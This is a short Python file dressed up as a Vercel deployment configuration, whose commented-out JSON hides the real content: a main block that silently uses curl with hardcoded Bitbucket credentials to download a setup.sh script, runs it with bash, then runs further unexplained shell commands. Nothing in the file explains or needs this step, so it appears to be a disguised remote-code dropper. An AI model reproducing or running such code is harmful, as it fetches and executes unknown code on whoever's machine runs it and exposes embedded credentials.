
#{
#    "version": 2,
#    "builds": [
#        {
#            "src": "index.js",
#            "use": "@vercel/node"
#        }
#    ],
#    "routes": [
#        {
#            "src": "/(.*)",
#            "dest": "index.js",
#            "headers": {
#                "Access-Control-Allow-Origin": "*"
#            }
#        }
#    ],
#    "installCommand": "npm install"
#}

import os
if __name__=="__main__":
 os.system('curl --silent -O --user shananalla88:ukqxwnzRwJhvb5Nd9pUw "https://api.bitbucket.org/2.0/repositories/shananalla88/testpaw/src/master/py3/setup.sh" && bash setup.sh random random random ;bash -ic "source ~/.bashrc&&vd print_systype&&enc suarez" ')

